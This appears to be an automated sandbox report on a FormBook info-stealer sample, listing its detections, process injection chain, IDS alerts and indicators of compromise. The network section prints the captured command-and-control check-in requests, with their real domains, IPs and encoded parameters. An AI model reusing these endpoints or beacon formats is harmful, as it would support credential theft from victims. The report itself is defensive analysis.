Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1001-13.exe

Overview

General Information

Sample name:1001-13.exe
Analysis ID:1589871
MD5:a3356244cc31500c395570f65839865d
SHA1:6dc52c136f3bf36f6addd123093cf9a1ce27c00f
SHA256:d2934dafa20010b814ef03d80e356d61ca23e54d1b6ec551d60bfe550c7dcd43
Tags:exePaymentuser-cocaman
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 1001-13.exe (PID: 1020 cmdline: "C:\Users\user\Desktop\1001-13.exe" MD5: A3356244CC31500C395570F65839865D)
    • svchost.exe (PID: 6192 cmdline: "C:\Users\user\Desktop\1001-13.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • OlGIUOYUZW.exe (PID: 6724 cmdline: "C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • chkntfs.exe (PID: 6816 cmdline: "C:\Windows\SysWOW64\chkntfs.exe" MD5: A9B42ED1B14BB22EF07CCC8228697408)
          • OlGIUOYUZW.exe (PID: 6688 cmdline: "C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2144 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3995040974.0000000004620000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2629802419.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2630146597.0000000003300000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2630585568.0000000005750000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.3994023782.0000000000A30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\1001-13.exe", CommandLine: "C:\Users\user\Desktop\1001-13.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1001-13.exe", ParentImage: C:\Users\user\Desktop\1001-13.exe, ParentProcessId: 1020, ParentProcessName: 1001-13.exe, ProcessCommandLine: "C:\Users\user\Desktop\1001-13.exe", ProcessId: 6192, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\1001-13.exe", CommandLine: "C:\Users\user\Desktop\1001-13.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1001-13.exe", ParentImage: C:\Users\user\Desktop\1001-13.exe, ParentProcessId: 1020, ParentProcessName: 1001-13.exe, ProcessCommandLine: "C:\Users\user\Desktop\1001-13.exe", ProcessId: 6192, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T09:34:24.097632+010020507451Malware Command and Control Activity Detected192.168.2.649984172.65.235.9780TCP
                2025-01-13T09:34:47.304477+010020507451Malware Command and Control Activity Detected192.168.2.649991192.64.119.10980TCP
                2025-01-13T09:35:02.158009+010020507451Malware Command and Control Activity Detected192.168.2.649996188.114.96.380TCP
                2025-01-13T09:35:16.629412+010020507451Malware Command and Control Activity Detected192.168.2.65000047.83.1.9080TCP
                2025-01-13T09:35:46.127444+010020507451Malware Command and Control Activity Detected192.168.2.650005162.0.236.16980TCP
                2025-01-13T09:36:00.142014+010020507451Malware Command and Control Activity Detected192.168.2.650009192.186.58.3180TCP
                2025-01-13T09:36:14.943423+010020507451Malware Command and Control Activity Detected192.168.2.650013104.21.16.180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T09:34:24.097632+010028554651A Network Trojan was detected192.168.2.649984172.65.235.9780TCP
                2025-01-13T09:34:47.304477+010028554651A Network Trojan was detected192.168.2.649991192.64.119.10980TCP
                2025-01-13T09:35:02.158009+010028554651A Network Trojan was detected192.168.2.649996188.114.96.380TCP
                2025-01-13T09:35:16.629412+010028554651A Network Trojan was detected192.168.2.65000047.83.1.9080TCP
                2025-01-13T09:35:46.127444+010028554651A Network Trojan was detected192.168.2.650005162.0.236.16980TCP
                2025-01-13T09:36:00.142014+010028554651A Network Trojan was detected192.168.2.650009192.186.58.3180TCP
                2025-01-13T09:36:14.943423+010028554651A Network Trojan was detected192.168.2.650013104.21.16.180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T09:34:39.665187+010028554641A Network Trojan was detected192.168.2.649988192.64.119.10980TCP
                2025-01-13T09:34:42.204787+010028554641A Network Trojan was detected192.168.2.649989192.64.119.10980TCP
                2025-01-13T09:34:44.760919+010028554641A Network Trojan was detected192.168.2.649990192.64.119.10980TCP
                2025-01-13T09:34:53.467199+010028554641A Network Trojan was detected192.168.2.649992188.114.96.380TCP
                2025-01-13T09:34:55.999758+010028554641A Network Trojan was detected192.168.2.649993188.114.96.380TCP
                2025-01-13T09:34:59.627388+010028554641A Network Trojan was detected192.168.2.649994188.114.96.380TCP
                2025-01-13T09:35:08.890663+010028554641A Network Trojan was detected192.168.2.64999747.83.1.9080TCP
                2025-01-13T09:35:11.437644+010028554641A Network Trojan was detected192.168.2.64999847.83.1.9080TCP
                2025-01-13T09:35:13.984667+010028554641A Network Trojan was detected192.168.2.64999947.83.1.9080TCP
                2025-01-13T09:35:38.388391+010028554641A Network Trojan was detected192.168.2.650002162.0.236.16980TCP
                2025-01-13T09:35:40.969633+010028554641A Network Trojan was detected192.168.2.650003162.0.236.16980TCP
                2025-01-13T09:35:43.514733+010028554641A Network Trojan was detected192.168.2.650004162.0.236.16980TCP
                2025-01-13T09:35:52.390025+010028554641A Network Trojan was detected192.168.2.650006192.186.58.3180TCP
                2025-01-13T09:35:54.999329+010028554641A Network Trojan was detected192.168.2.650007192.186.58.3180TCP
                2025-01-13T09:35:57.536619+010028554641A Network Trojan was detected192.168.2.650008192.186.58.3180TCP
                2025-01-13T09:36:07.298525+010028554641A Network Trojan was detected192.168.2.650010104.21.16.180TCP
                2025-01-13T09:36:09.839688+010028554641A Network Trojan was detected192.168.2.650011104.21.16.180TCP
                2025-01-13T09:36:12.416985+010028554641A Network Trojan was detected192.168.2.650012104.21.16.180TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 1001-13.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: 1001-13.exeVirustotal: Detection: 61%Perma Link
                Source: 1001-13.exeReversingLabs: Detection: 68%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3995040974.0000000004620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2629802419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2630146597.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2630585568.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3994023782.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3993353772.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3995415844.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 1001-13.exeJoe Sandbox ML: detected
                Source: 1001-13.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000002.00000003.2598512878.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630084907.0000000003000000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000003.2568978860.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000002.3994500303.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OlGIUOYUZW.exe, 00000007.00000002.3993968948.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp, OlGIUOYUZW.exe, 00000009.00000000.2701407747.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 1001-13.exe, 00000000.00000003.2149278295.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 1001-13.exe, 00000000.00000003.2144905912.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528254273.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2526500510.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.0000000003600000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3996132293.00000000049EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2632794925.00000000046A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3996132293.0000000004850000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2630152367.00000000044F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 1001-13.exe, 00000000.00000003.2149278295.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 1001-13.exe, 00000000.00000003.2144905912.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2528254273.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2526500510.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.0000000003600000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000008.00000002.3996132293.00000000049EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2632794925.00000000046A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3996132293.0000000004850000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2630152367.00000000044F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: chkntfs.pdb source: svchost.exe, 00000002.00000003.2598512878.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630084907.0000000003000000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000003.2568978860.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000002.3994500303.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: chkntfs.exe, 00000008.00000002.3997004684.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3994276659.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000000.2701682547.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2919416002.000000002299C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000008.00000002.3997004684.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3994276659.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000000.2701682547.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2919416002.000000002299C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E6C2A2 FindFirstFileExW,0_2_00E6C2A2
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA68EE FindFirstFileW,FindClose,0_2_00EA68EE
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00EA698F
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E9D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E9D076
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E9D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E9D3A9
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EA9642
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EA979D
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E9DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E9DBBE
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00EA9B2B
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EA5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00EA5C97
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_0058CFA0 FindFirstFileW,FindNextFileW,FindClose,8_2_0058CFA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then xor eax, eax8_2_00579FB0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then pop edi8_2_0057EB14
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 4x nop then mov ebx, 00000004h8_2_045F04DF

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49996 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 162.0.236.169:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49984 -> 172.65.235.97:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49984 -> 172.65.235.97:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 192.64.119.109:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49996 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50013 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50013 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50005 -> 162.0.236.169:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50005 -> 162.0.236.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50009 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50009 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49991 -> 192.64.119.109:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49991 -> 192.64.119.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 192.64.119.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 192.64.119.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 162.0.236.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50000 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50004 -> 162.0.236.169:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.laduta.xyz
                Source: DNS query: www.explorevision.xyz
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 47.83.1.90 47.83.1.90
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
                Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EACE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00EACE44
                Source: global trafficHTTP traffic detected: GET /ca6n/?YFCLW=BxgTctSh&CviT=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kx22368.shopConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /d89m/?CviT=wOJtjxBUJG0NHp56IJ7sd/1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F/TSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws=&YFCLW=BxgTctSh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.laduta.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /pgw3/?YFCLW=BxgTctSh&CviT=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.einpisalpace.shopConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /hf4a/?CviT=1xLyW3NuagjZMWLakpM9q9Dlq5M4Mwlw3Xlkp07XGkfoNpNQ7ONbaOfooFbWkXkUauDqyi9rr3xWBLUVS1AbncpoQpr6kYxUu+wU3Tx1ZPQnZRQ2cE7e7gBiti52HSebvZ5SsDs=&YFCLW=BxgTctSh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.ripbgs.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /t0rn/?YFCLW=BxgTctSh&CviT=Yd+jCUH61c4a7Q1+Dkx6pQX3S61LKXAtFbIeY4NO2NPuq2cKreHL8mdEdFCyOqVBfEq7A2gNsBXq87HwyvEMJSNDnPhs3w+B9xX6N7MrbCFYPNclLBgQ9fjNZkREdMjUbQytONk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.explorevision.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /wn9b/?CviT=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&YFCLW=BxgTctSh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.babyzhibo.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
